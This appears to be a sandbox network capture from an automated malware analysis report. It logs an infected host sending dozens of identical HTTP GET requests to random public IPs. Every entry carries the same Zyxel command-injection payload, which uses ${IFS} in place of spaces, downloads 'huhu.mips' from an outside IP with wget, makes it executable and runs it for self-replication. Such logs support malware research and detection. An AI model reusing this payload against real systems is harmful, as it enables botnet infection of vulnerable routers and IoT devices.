                                              Jan 29, 2024 07:03:56.119235992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5895192.168.2.144377020.130.245.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119282961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5896192.168.2.1448492120.174.1.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119306087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5897192.168.2.1451472138.207.143.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119379997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5898192.168.2.145393067.91.232.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119385004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5899192.168.2.145170827.152.180.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119432926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5900192.168.2.144666231.123.43.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119474888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5901192.168.2.1452278139.100.173.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119512081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5902192.168.2.144435220.24.27.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119540930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5903192.168.2.1434888189.237.142.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119599104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5904192.168.2.143307442.236.221.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119641066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5905192.168.2.145433671.98.78.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119692087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5906192.168.2.143905088.59.78.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119714022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5907192.168.2.1446010194.115.14.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119757891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5908192.168.2.144484040.128.248.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119807959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5909192.168.2.145004651.252.112.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119839907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5910192.168.2.14476604.190.22.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119863033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5911192.168.2.1437130171.194.140.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119895935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5912192.168.2.1459190196.171.136.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119935036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5913192.168.2.144151482.240.187.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119991064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5914192.168.2.144948642.24.173.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120035887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5915192.168.2.143917092.78.177.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120058060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5916192.168.2.1437854119.77.92.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120105982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5917192.168.2.1443796196.115.177.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120151997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5918192.168.2.1439768119.87.227.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120170116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5919192.168.2.144547676.230.175.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120210886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5920192.168.2.1438846129.35.82.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120275974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5921192.168.2.1447576102.249.93.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120322943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5922192.168.2.1440608153.213.198.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120358944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5923192.168.2.1436824136.186.78.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120394945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5924192.168.2.1434224119.170.116.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120457888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5925192.168.2.14496081.145.247.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120496988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5926192.168.2.1437892208.49.9.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120532036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5927192.168.2.144222820.159.69.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120569944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5928192.168.2.1457192122.120.243.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120609999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5929192.168.2.1453822109.93.118.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120641947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5930192.168.2.1455538221.118.13.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120667934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5931192.168.2.144324214.81.24.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120704889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5932192.168.2.144350043.247.164.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120754957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5933192.168.2.1436100105.61.228.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120783091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5934192.168.2.145449886.82.237.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120841026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5935192.168.2.1459248223.225.222.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120896101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5936192.168.2.144217863.156.121.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120924950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5937192.168.2.1459152200.253.148.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120959997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5938192.168.2.1433632179.244.176.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.120982885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5939192.168.2.1453484135.113.55.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121046066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5940192.168.2.145765632.6.249.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121073961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5941192.168.2.1455050128.126.127.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121107101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5942192.168.2.144505877.64.112.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121170044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5943192.168.2.14500124.165.115.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121191025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5944192.168.2.1440514143.196.182.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121237993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5945192.168.2.145303296.81.112.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121265888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5946192.168.2.1441828178.78.21.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121313095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5947192.168.2.14474581.151.194.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121347904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5948192.168.2.145081839.138.205.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121406078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5949192.168.2.143394054.137.169.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121428967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5950192.168.2.1447574105.52.29.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121455908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5951192.168.2.1455046173.7.241.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121511936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5952192.168.2.1442848205.151.154.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121546984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5953192.168.2.143302289.199.166.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121613979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5954192.168.2.143722090.47.135.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121635914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5955192.168.2.1460666196.2.203.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121686935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5956192.168.2.145916037.119.106.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121721029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5957192.168.2.1460672200.88.128.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121757030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5958192.168.2.14601402.189.241.109443
                                              TimestampBytes transferredDirectionData
